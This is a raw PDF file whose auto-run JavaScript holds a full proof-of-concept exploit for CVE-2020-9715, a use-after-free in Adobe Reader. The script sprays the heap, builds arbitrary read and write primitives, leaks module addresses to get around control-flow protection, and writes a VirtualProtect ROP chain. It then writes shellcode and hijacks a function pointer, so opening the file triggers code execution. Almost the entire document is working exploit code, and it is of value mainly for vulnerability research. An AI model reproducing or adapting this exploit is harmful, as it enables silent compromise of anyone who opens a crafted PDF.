%PDF-1.1
1 0 obj
<<
/Pages 2 0 R
/Names <<
    /EmbeddedFiles <<
        /Names [(poc.pdf) <<
            /EF <<
                /F 5 0 R
                >>
            /F (poc.txt)
            /Type /F
            /UF (poc.txt)
            >>]
        >>
    >>
/OpenAction <<
    /S /JavaScript /JS(
/* 
CVE-2020-9715
Found by: Mark Yason (@markyason)
POC by: Steven Seeley (mr_me)
Tekniq: element buffer reclaim
SHA1(AcroRdrDC2000920063_en_US.exe) = 39722fa7f45fa46b7d21ad2a96f4b0d3da5983eb

References:
1. https://www.zerodayinitiative.com/advisories/ZDI-20-991/
2. https://www.zerodayinitiative.com/blog/2020/9/2/cve-2020-9715-exploiting-a-use-after-free-in-adobe-reader
3. https://starlabs.sg/blog/2020/04/tianfu-cup-2019-adobe-reader-exploitation/
*/

console.show();

var array_buffer_spray   = new Array(0x8000);
var FAKE_STRING_ADDR     = 0x40000058;                  // fake string location
var FAKE_TYPEDARRAY_ADDR = FAKE_STRING_ADDR+0x10;       // fake array location
var HEAP_SEGMENT_SIZE    = 0x10000;
var REUSED               = null;                        // the reused free buffer
var SHELLCODE_ADDR       = 0x13333337;

// it's important that these are the same size for the plunge
var esobject 	         = Array(0x400);
var esobject_holes       = Array(0x400);

function gc() { new ArrayBuffer(3*1024*1024*100); }
function s2h(s) {
    var n1 = s.charCodeAt(0)
    var n2 = s.charCodeAt(1)
    return ((n2<<16)|n1)>>>0
}

function spray_string_buffers() {
    for (var i = 0; i < array_buffer_spray.length; i++) {
        array_buffer_spray[i] = new ArrayBuffer(HEAP_SEGMENT_SIZE-0x10-0x8);
        var dv = new DataView(array_buffer_spray[i]);
	    
        // faking a string
        dv.setUint32(0, 0x102, true);               // string header
        dv.setUint32(4, FAKE_STRING_ADDR+12, true); // string buffer, point here to leak back idx
        dv.setUint32(8, 0x1f, true);                // string length
        dv.setUint32(12, i, true);                  // index into array_buffer_spray
    }
}

function trigger_uaf() {

    // reclaim 1024 arrays
    for(var j=0; j<0x400; j++) f.currentValueIndices;

    // check for success
    try {
        if (this.dataObjects[0][0] != 0) {
            var reclaim = this.dataObjects[0];
            console.println('(-) failed to reclaim data object');
            throw ''
        }
    }
    catch (err) {
        console.println('(-) failed to reclaim data object');
        throw ''
    }
    console.println('(+) successfully reclaimed data object')
	
    // free all allocated array objects
    f                   = null;
    reclaim             = null;
    esobject_holes      = null;
    this.dataObjects[0] = null;
    gc();

    // reclaim 
    for(var i=0; i<esobject.length; i++) {
        // reclaim elements buffer which is allocated w/ size 0x110 (0x100 + 0x10 for header)
        esobject[i] = new Uint32Array(64);
        esobject[i][0] = SHELLCODE_ADDR;   // marker to look for 
        esobject[i][1] = 0xffffff81;       // integer
    }

    // check for success again
    if (this.dataObjects[0][0] == SHELLCODE_ADDR){
        REUSED = this.dataObjects[0];
    }

    if (REUSED == null) {
        console.println('(-) failed to reclaim element buffer');
        throw '';
    } else console.println('(+) successfully reclaimed element buffer');

    // create and leak the address of an array buffer
    var write_array = new Uint32Array(8);
    REUSED[0] = write_array;
    REUSED[1] = 0x11556611;
    for(var i=0; i<esobject.length; i++) {
        if (esobject[i][0] != SHELLCODE_ADDR) {
            var fake_elements = esobject[i];
            var write_array_addr = esobject[i][0];
            console.println('(+) write_array: ' + write_array_addr.toString(16))
            break
        } else {
            esobject[i] = null
        }
    }

    // point one of our element to fake string
    fake_elements[4] = FAKE_STRING_ADDR;
    fake_elements[5] = 0xffffff85; // string

    // create aar primitive using a fake string object
    var spray_idx = s2h(REUSED[2]);	
    console.println('(+) leaked index: 0x' + spray_idx.toString(16))
    var dv = DataView(array_buffer_spray[spray_idx])

    function read(addr) {
        dv.setUint32(4, addr, true)
        return s2h(REUSED[2])
    }

    // create aaw primitive by copying and faking WRITE_ARRAY 
    for(var i=0; i<32; i++) {
        dv.setUint32(i*4+16, read(write_array_addr+i*4), true);
    }

    fake_elements[6] = FAKE_TYPEDARRAY_ADDR; // location of our copied WRITE_ARRAY
    fake_elements[7] = 0xffffff87;           // object
    function write(addr, val) {
        // (ab)using the ArrayBufferObject
        dv.setUint32(96, addr, true);
        REUSED[3][0] = val;
    }

    var write_arr_obj_elements_ptr = read(write_array_addr+0xc);
    var escript_base_addr = write_arr_obj_elements_ptr - 0x275528;
    console.println('(+) escript: 0x'+ escript_base_addr.toString(16))

    // used to leak ptrs
    var a = new Array(2);

    // used to leak acroform and icucnv58
    a[0] = this.addField("t", "text", 0, [0, 0, 0, 0 ]);
    a[0].value = "1337";
	
    // used for rce primitive
    var rce = {};
    a[1] = rce;
    REUSED[4] = a;                                 // this is where we are leaking from
    fake_elements[9] = 0xffffff87;                 // object
    var elements_ptr = read(fake_elements[8]+0xc); // get the elements ptr from the array
    var ctextfield_addr = read(elements_ptr);      // get the 1st element (a[0])
    var rce_addr = read(elements_ptr+0x8);         // get the 2nd element (a[1])

    // acroform base
    var acroform_addr_delta = 0x2827d0;
    var acroform_base_addr = read(read(ctextfield_addr+0x10)+0x34) - acroform_addr_delta;
    console.println('(+) acroform: 0x' + acroform_base_addr.toString(16))

    // icucnv58 base (for CFI bypass)
    var icucnv58_addr_delta = 0xc3ad8c;
    var icucnv58_base_addr = read(read(acroform_base_addr+icucnv58_addr_delta)+0x10);
    console.println('(+) icucnv58: 0x' + icucnv58_base_addr.toString(16))

    // virtualprotect stub ptr
    var vp_stub = read(escript_base_addr+0x1af058);
    var sp = icucnv58_base_addr+0x95907;       // mov esp, 0x59000008; ret;

    // write our rop chain
    write(0x59000008,    vp_stub);             // VirtualProtect
    write(0x59000008+4,  SHELLCODE_ADDR);      // return address
    write(0x59000008+8,  SHELLCODE_ADDR);      // buffer
    write(0x59000008+12, 0x1000);              // sz
    write(0x59000008+16, 0x40);                // new protect
    write(0x59000008+20, SHELLCODE_ADDR-0x20); // old protect

    // write the shellcode
    shellcode = [
        0x0082e8fc, 0x89600000, 0x64c031e5, 0x8b30508b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0x3cacff31,
        0x2c027c61, 0x0dcfc120, 0xf2e2c701, 0x528b5752, 0x3c4a8b10, 0x78114c8b, 0xd10148e3, 0x20598b51,
        0x498bd301, 0x493ae318, 0x018b348b, 0xacff31d6, 0x010dcfc1, 0x75e038c7, 0xf87d03f6, 0x75247d3b,
        0x588b58e4, 0x66d30124, 0x8b4b0c8b, 0xd3011c58, 0x018b048b, 0x244489d0, 0x615b5b24, 0xff515a59,
        0x5a5f5fe0, 0x8deb128b, 0x8d016a5d, 0x0000b285, 0x31685000, 0xff876f8b, 0xb5f0bbd5, 0xa66856a2,
        0xff9dbd95, 0x7c063cd5, 0xe0fb800a, 0x47bb0575, 0x6a6f7213, 0xd5ff5300, 0x636c6163, 0x00000000
    ]
    for (var i = 0; i < shellcode.length; i++) {
        write(SHELLCODE_ADDR+i*4, shellcode[i]);
    }

    // pwn the enumerate function ptr with the stack pivot
    write(read(read(rce_addr+0x4))+0x1c, sp);

    // gain rce	
    rce.go;
}

// fake some strings
spray_string_buffers();

// prepare array elements buffer
var f = this.addField("f" , "listbox", 0, [0,0,0,0]);
var t = Array(32);
for(var i=0; i<32; i++) t[i] = i;
f.multipleSelection = 1;
f.setItems(t);

// lfh activation for esobject
f.currentValueIndices = [1,2];
for(var i=0; i<esobject_holes.length; i++) esobject_holes[i] = f.currentValueIndices;
f.currentValueIndices = t;

// trigger allocation
this.dataObjects[0].toString();  

// remove reference
this.dataObjects[0] = null; 

// free (via setTimeOut) and re-use (inside of trigger_uaf)
var g_timeout = app.setTimeOut("trigger_uaf()", 1000);

	)
	>>
>>
endobj

2 0 obj
<< /Kids [3 0 R] /Type /Pages /Count 1 >>
endobj

3 0 obj
<< /Parent 2 0 R  /MediaBox [0 0 612 792]
/Resources << /Font << /F1 <<
/BaseFont /Arial /Subtype /Type1 /Type /Font>>
>> >> /Contents 4 0 R /Type /Page >>
endobj

4 0 obj
<< /Length 53 >>
stream
BT
  /F1 110
  /C0_0 12 Tf
  25.368 764.65 Td
  (CVE-2020-9715) Tj
ET
endstream
endobj

5 0 obj 
<<
/Length 12
/Type /EmbeddedFile
>>
stream
Hello World!
endstream 
endobj

xref
0 6
0000000000 65535 f 
0000000016 00000 n 
0000000290 00000 n 
0000000348 00000 n 
0000000520 00000 n 
0000000623 00000 n 

trailer << /Root 1 0 R /Size 6 >>

startxref
708
%%EOF